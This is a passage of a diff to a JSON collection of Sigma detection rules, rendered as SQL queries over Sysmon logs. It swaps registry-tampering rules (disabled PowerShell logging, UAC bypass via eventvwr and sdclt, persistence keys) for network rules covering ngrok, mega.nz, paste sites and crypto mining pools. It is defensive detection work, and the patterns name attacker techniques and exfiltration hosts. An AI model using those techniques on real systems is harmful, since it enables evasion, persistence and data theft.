"filename": "registry_delete_removal_amsi_registry_key.yml" }, { - 
"title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program 
Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use 
IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname 
LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - 
"id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE 
'%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - 
"author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 
'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 
'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' 